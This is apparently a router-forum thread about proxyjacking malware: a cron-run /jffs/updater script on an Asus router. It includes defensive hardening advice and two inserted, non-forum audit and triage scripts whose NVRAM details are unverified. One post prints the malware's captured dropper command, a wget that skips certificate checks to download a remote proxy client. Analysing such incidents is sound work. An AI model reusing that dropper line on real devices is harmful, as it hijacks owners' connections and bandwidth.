Malware /jffs/updater script.

We call this Proxyjacking. This is a well-known attack. This is not malware but an exploit. It's not new. The only difference is the code (a little bit different). There is a funny thing: if I talk about these kinds of attacks on SNBForums, some people don't believe it. Some of them even say it doesn't exist. Don't forget that you don't even know you are compromised by this attack, even if you use Skynet or something else. Some attacks can evade those firewall scripts. Some code can be generated with ChatGPT or something.

.Swistheater?

If you are targeted, the attacker may attack you again and again, even if you change the router or reset the firmware, unless you change the IP address to a different range.
I spoofed my MAC address to force an IP update by the modem.
 
It doesn't work if you change only the IP address. You have to change the IP range. Did you do that?
All I can say is the whole address changed, including the range it resides in.
 
Good. Now check your PC and the devices you are using, to be sure. If there is a host on any device connected to your network, it can do this thing again.
^ This. ;)
 
We call this Proxyjacking. This is a well-known attack. This is not malware but an exploit. It's not new. The only difference is the code (a little bit different). There is a funny thing: if I talk about these kinds of attacks on SNBForums, some people don't (and didn't) believe it. Some of them even say it doesn't exist. Don't forget that you don't even know you are compromised by this attack, even if you use Skynet or something else. Some attacks can evade those firewall scripts. Some code can be generated with ChatGPT or something.

.Swistheater?

If you are targeted, the attacker may attack you again and again, even if you change the router or reset the firmware, unless you change the IP address to a different range.

As long as you fix the "hole", then even if they continue to target you, they shouldn't get in. Of course the challenge is figuring out what that hole is. If they're targeting from the outside, yes, getting your IP to change can help, but if it is malware on the inside or related to VPN or DDNS, that won't do anything.

Personally I'd be using a completely new and very secure username and password on the router, after factory resetting, flashing with fresh known-good firmware from a known-clean PC, then factory resetting again. Of course all devices are OFF the network until each one is checked and cleaned in an isolated environment.
 
Do you think routers on John's fork could be impacted?
It's difficult to say, as we don't know how the malware is getting onto the router. But certainly, if it does get onto the router, it would likely be a bigger problem, because John's firmware doesn't have asd to neuter it.
 
Good. Now check your PC and the devices you are using, to be sure. If there is a host on any device connected to your network, it can do this thing again.
Hah, it most likely utilized an unknown security flaw present on the router, because no devices were present on the network the day that script originated. I was out of town.
 
As long as you fix the "hole", then even if they continue to target you, they shouldn't get in. Of course the challenge is figuring out what that hole is. If they're targeting from the outside, yes, getting your IP to change can help, but if it is malware on the inside or related to VPN or DDNS, that won't do anything.
I've already mentioned it.
Personally I'd be using a completely new and very secure username and password on the router, after factory resetting, flashing with fresh known-good firmware from a known-clean PC, then factory resetting again. Of course all devices are OFF the network until each one is checked and cleaned in an isolated environment.
None of your solutions work if he's targeted, because this is not normal hacking but an exploit.
 
It's difficult to say, as we don't know how the malware is getting onto the router. But certainly, if it does get onto the router, it would likely be a bigger problem, because John's firmware doesn't have asd to neuter it.
This is not malware but an exploit. An exploit can bypass any security stuff if the device has a vulnerability.
 
Hah, it most likely utilized an unknown security flaw present on the router, because no devices were present on the network the day that script originated. I was out of town.
I hope you are not targeted. There are some solutions for you. However, just keep watching your network very often for now. Let me know if you have the same issue again. Then I will tell you how to do it.
 
Hah, it most likely utilized an unknown security flaw present on the router, because no devices were present on the network the day that script originated. I was out of town.
Do not trust ANY consumer router, including ASUS. There are a lot of unknown vulnerabilities, like zero-day attacks. There are too many unknown vulnerabilities that the manufacturers never know about, even in the future. Those vulnerabilities are traded for money on the black market.
 
This is not malware but an exploit. An exploit can bypass any security stuff if the device has a vulnerability.
I know English isn't your first language but what we've been discussing here is malware. An exploit would be the method used to get it onto the router.

 
Some versions of the 384 code had a vulnerability that let people in from the WAN if you had WAN access enabled, even if they didn't have your password. Even on 386, they can brute-force or try common passwords and get in. It seems to be botnets programmatically attacking Asus routers; in fact, once your router is infected, one of its functions is probably to find and attack other routers.

WAN HTTP/HTTPS access should be disabled. Ideally SSH too. If you must have SSH enabled to the WAN, I would not only have a very strong password but also restrict it to only a client key that you give yourself. Merlin also rate-limits failed SSH logins, so that helps protect against brute force, but I'd still restrict it to the key.

Vulnerabilities in VPN could also give someone access to your router.

Thanks for the information about the old firmware versions. ;)

Yes you are right. I currently have these basic settings:

#WAN

Code:
MAC Address = Changed

#Firewall

Code:
Enable Firewall    = Yes
Enable DoS protection = Yes
Respond ICMP Echo (ping) Request from WAN = No

#System

Code:
Router Login Password = Strong
Enable SSH = LAN Only
Allow SSH Port Forwarding = No
SSH Port = Changed
Allow Password Login = No
Authorized Keys = Yes (+ private key with strong password)

Code:
Authentication Method = HTTPS
HTTPS LAN port = Changed
Installed Server Certificate = Yes

Code:
Enable Web Access from WAN = No
Enable Access Restrictions = Yes (x2 devices of my network)

Note: with the option "Allow Password Login = No", I have disabled it to reject USER + PASSWORD login requests over SSH, allowing only the private key. Is this configuration/thought correct?

So what comes to mind are, for example, these two options:

- an infected client
- an OpenVPN service vulnerability/misconfiguration (server/client); I use this option a lot.

Is WireGuard currently more secure than OpenVPN? Or have its vulnerabilities not yet been discovered/exposed?
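The settings listed in this post, and the earlier advice in the thread to keep HTTP/HTTPS and SSH off the WAN and to allow only key-based SSH, all map onto NVRAM variables on Asuswrt-Merlin, so the checklist can be scripted. The audit script below is an added example, not code posted in the thread or code from the Asuswrt-Merlin project. The variable names (sshd_enable, sshd_pass, sshd_forwarding, sshd_port, misc_http_x, http_enable, fw_enable_x, fw_dos_x, misc_ping_x) and their value encodings are assumptions from memory of Merlin's NVRAM layout; confirm them on your own unit with `nvram show | grep -E 'sshd|http|fw_|ping'` before trusting a result. The two NVRAM samples are constructed for the offline demo, not captured from any router.

```shell
#!/bin/sh
# Asuswrt-Merlin hardening audit (added example). NVRAM variable names and
# encodings below are assumptions from memory; verify with `nvram show`.

# Constructed NVRAM samples (not captured from a real router): a router with WAN
# management exposed, and one matching the checklist in the post.
EXPOSED_SAMPLE='sshd_enable=1
sshd_pass=1
sshd_port=22
sshd_forwarding=1
misc_http_x=1
http_enable=0
fw_enable_x=1
fw_dos_x=0
misc_ping_x=1'

HARDENED_SAMPLE='sshd_enable=2
sshd_pass=0
sshd_port=2222
sshd_forwarding=0
misc_http_x=0
http_enable=1
fw_enable_x=1
fw_dos_x=1
misc_ping_x=0'

# nv_get NAME: value of one variable, from $NV_SAMPLE when set (offline demo),
# otherwise from the live NVRAM via `nvram get`.
nv_get() {
    if [ -n "${NV_SAMPLE:-}" ]; then
        printf '%s\n' "$NV_SAMPLE" | sed -n "s/^$1=//p"
    else
        nvram get "$1"
    fi
}

# expect NAME WANT MESSAGE: print a FINDING line when NAME is not WANT.
expect() {
    val=$(nv_get "$1")
    if [ "$val" != "$2" ]; then
        printf 'FINDING %s=%s (want %s): %s\n' "$1" "${val:-unset}" "$2" "$3"
    fi
}

# audit: one FINDING per deviation from the checklist; silent when all match.
# Assumed encodings: sshd_enable 0=off 1=LAN+WAN 2=LAN only;
#                    http_enable 0=HTTP 1=HTTPS 2=both.
audit() {
    expect sshd_enable     2 "SSH reachable from WAN; set Enable SSH to LAN only"
    expect sshd_pass       0 "SSH password login allowed; use authorized keys only"
    expect sshd_forwarding 0 "SSH port forwarding allowed"
    expect misc_http_x     0 "web UI reachable from WAN"
    expect http_enable     1 "web UI accepts plain HTTP; use HTTPS only"
    expect fw_enable_x     1 "firewall disabled"
    expect fw_dos_x        1 "DoS protection disabled"
    expect misc_ping_x     0 "router answers ICMP echo from WAN"
    if [ "$(nv_get sshd_port)" = "22" ]; then
        printf 'FINDING sshd_port=22: default port attracts bot scans (no substitute for key-only login)\n'
    fi
}

# count_findings SAMPLE: number of FINDING lines for a sample ("" = live router).
count_findings() {
    ( NV_SAMPLE="$1"; audit ) | awk '/^FINDING/ { n++ } END { print n + 0 }'
}

# Usage on the router: sh audit.sh        (live NVRAM, prints findings)
#            offline:  sh audit.sh demo   (runs both constructed samples)
case "${1:-}" in
    demo)
        printf 'exposed sample: %s findings\n'  "$(count_findings "$EXPOSED_SAMPLE")"
        printf 'hardened sample: %s findings\n' "$(count_findings "$HARDENED_SAMPLE")"
        ;;
    "")
        # a live run only makes sense where `nvram` exists, i.e. on the router
        if command -v nvram >/dev/null 2>&1; then audit; fi
        ;;
esac
```

A clean audit only says the management services match the checklist; it does not prove the router is clean, and it says nothing about the two surfaces the post is actually asking about (an infected LAN client, or the OpenVPN server the poster keeps exposed), which the NVRAM settings above do not cover.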
 
As long as you fix the "hole", then even if they continue to target you, they shouldn't get in. Of course the challenge is figuring out what that hole is. If they're targeting from the outside, yes, getting your IP to change can help, but if it is malware on the inside or related to VPN or DDNS, that won't do anything.

Personally I'd be using a completely new and very secure username and password on the router, after factory resetting, flashing with fresh known-good firmware from a known-clean PC, then factory resetting again. Of course all devices are OFF the network until each one is checked and cleaned in an isolated environment.
It could possibly be DDNS-related; however, one factor to consider is that the wget log I posted shows the first appearance happened right after a firmware update check was conducted on the router.

Code:
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

While I am not saying it is RMerlin-related, someone snooping could have seen an opportunity to exploit a vulnerability in wget or in the connection. I am still a bit on the fence about this one. I was out of town the day the malware hit the router. No devices were online except for some blocked IoT cameras. All computers were fully shut down.
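Read child-first, the ancestry log above says more than "a wget ran". The firmware check (9213) descends from watchdog and webs_update.sh and fetches from fwupdate.asuswrt-merlin.net with certificate verification on; both pawns-cli downloads descend from /jffs/updater, and the first of those (10604) was started by crond, which is the persistence: a cron job re-running the dropper. The script below is an added example, not something posted in the thread. It parses "(pid)command" lines of that shape, flags any wget that disables certificate checking or pulls from a host outside a short allow-list, and reports whether crond sits in the chain. The sample is the post's own lines copied inline so it runs offline; the allow-list and the assumption that each chain ends at pid 0 are mine.

```shell
#!/bin/sh
# Triage of "(pid)command" process-ancestry lines (added example, not from the thread).
# Chains are listed child first and end at "(0)/sbin/init" (assumption from the log format).

# Sample: the post's own log lines, copied inline so the script runs offline.
SAMPLE_LOG='(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater'

# Hosts the firmware is expected to fetch from (my allow-list; extend for your setup).
KNOWN_HOSTS='fwupdate.asuswrt-merlin.net'

# triage: reads chains on stdin; prints one SUSPECT line per chain whose wget
# disables TLS verification or pulls from a host outside KNOWN_HOSTS, and says
# whether crond is an ancestor (a cron job re-running the dropper = persistence).
triage() {
    awk -v known="$KNOWN_HOSTS" '
    function flush() {
        if (suspect != "")
            printf "SUSPECT pid=%s host=%s (%s) launched_by=%s\n",
                   suspect, host, why, (viacron ? "crond, cron persistence" : "not cron")
        suspect = ""; viacron = 0
    }
    BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
    {
        pid = $0; sub(/^\(/, "", pid); sub(/\).*/, "", pid)
        cmd = $0; sub(/^\([0-9]*\)/, "", cmd)
        if (cmd ~ /(^|\/)crond( |$)/) viacron = 1
        if (cmd ~ /(^|\/)wget /) {
            url = cmd; sub(/.*https?:\/\//, "", url); sub(/ .*/, "", url)
            host = url; sub(/\/.*/, "", host)
            why = ""
            if (cmd ~ /--no-check-certificate/) why = "skips TLS verification"
            if (!(host in ok)) why = why (why == "" ? "" : ", ") "host not in allow-list"
            if (why != "") suspect = pid
        }
        if (pid == "0") flush()
    }
    END { flush() }'
}

# count_suspects LOG: number of SUSPECT lines for a log given as a string.
count_suspects() {
    printf '%s\n' "$1" | triage | awk 'END { print NR + 0 }'
}

# cron_launched LOG: number of suspect chains that crond started.
cron_launched() {
    printf '%s\n' "$1" | triage | awk '/cron persistence/ { n++ } END { print n + 0 }'
}

# Usage: sh triage.sh          (runs the inline sample)
#        sh triage.sh chains   (a file of your own "(pid)command" lines, child first)
if [ -n "${1:-}" ]; then
    triage < "$1"
else
    printf '%s\n' "$SAMPLE_LOG" | triage
fi
```

On a live Merlin router the same question is answered directly: `cru l` lists the cron jobs the firmware knows about, and an entry that invokes /jffs/updater is the persistence to remove along with the script itself. Treat the allow-list miss as the stronger signal; `--no-check-certificate` on its own only tells you the downloader did not care who it was talking to.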
 
While I am not saying it is RMerlin-related, someone snooping could have seen an opportunity to exploit a vulnerability in wget or in the connection. I am still a bit on the fence about this one. I was out of town the day the malware hit the router. No devices were online except for some blocked IoT cameras. All computers were fully shut down.

This is definitely a headscratcher. :(
 
Do not trust ANY consumer router, including ASUS. There are a lot of unknown vulnerabilities, like zero-day attacks. There are too many unknown vulnerabilities that the manufacturers never know about, even in the future. Those vulnerabilities are traded for money on the black market.

So do Windows, Mac, or Linux, for that matter, in general... but that doesn't stop us from using them.
 
This is definitely a headscratcher. :(
It makes sense though; how else would someone know they could monetize the source router's connection? Obviously, the person knew what they were doing. It is a highly targeted approach to achieving their goal.
 
